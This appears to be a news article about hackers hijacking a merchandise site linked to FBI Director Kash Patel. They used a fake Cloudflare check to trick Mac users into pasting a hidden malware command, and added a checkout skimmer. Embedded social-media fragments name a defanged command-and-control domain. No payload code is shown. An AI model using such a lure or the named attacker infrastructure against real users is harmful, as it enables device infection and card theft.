FBI Director Kash Patel is facing a second major cybersecurity breach in as many months. His personal merchandise website, BasedApparel.com, wastaken offlineon Friday after hackers reportedly hijacked it to distribute malware to unsuspecting visitors.

The site, which sells 'K$H'-branded clothing, books, and accessories, was co-created by Patel and Andrew Ollis before Patel was confirmed as FBI director under the Trump administration. The FBI has since stated that Patel 'divested from any interest' in the brand and does not profit from its sales.

Visitors to BasedApparel.com were met with what appeared to be a routine Cloudflare verification page — the kind commonly used to screen out automated traffic. This one, however, had been tampered with. It displayed a warning claiming the visitor's IP address had been flagged for 'irregular web activity.'

Users were then prompted to copy a line of text and paste it into their Mac's terminal. The visible text appeared innocuous, reading: 'I am not a robot: Cloudflare Verification ID: 801470.' Clicking 'copy,' however, secretly grabbed an entirely different string — a base64-encoded shell command that silently downloaded malware onto the device once executed. This technique is known in cybersecurity as a 'ClickFix' attack, and it works not by breaking through security systems, but by manipulating users into doing the attacker's work themselves.

lmao kash patel's stupid merch store has an infostealer built inpic.twitter.com/vQyYru6IuD

WifiRumHam also claimed to have uncovered a payment skimmer on the site's checkout page, apparently intended to capture credit card details from anyone who attempted to buy something. WifiRumHam said the attack was made possible through a malicious WordPress plugin installed by the attacker. How the attacker first gained access to the site remains unknown.

CORRECTION + FULL ANALYSIS VT UPLOAD: Live dual-payload campaign on compromised WooCommerce siteCredit@dm4uz31/ Correction first -- earlier thread had the wrong C2 domain. It's monterushy[.]com, not monterusei[.]com. Apologies for the bad IOC.2/ Compromised site:…

By Friday morning, BasedApparel.com had gone dark. Its homepage carried a message that read: 'We'll be right back. We're making improvements to better serve you. The store will be back online shortly — bolder than ever,' urging visitors to 'stay based.'

In a statement to Straight Arrow News, the FBI declined to say whether it is investigating the breach.

Two breaches in under two months involving the FBI director's personal accounts and affiliated platforms raise broader questions about digital security standards for senior government officials. The Based Apparel attack required no sophisticated intrusion — it exploited the trust of ordinary visitors through social engineering alone. Cybersecurity experts warn that ClickFix-style attacks are growing in frequency precisely because they bypass technical defences entirely, targeting human behaviour instead. For a sitting FBI director, the back-to-back incidents present an uncomfortable irony.

Source: International Business Times UK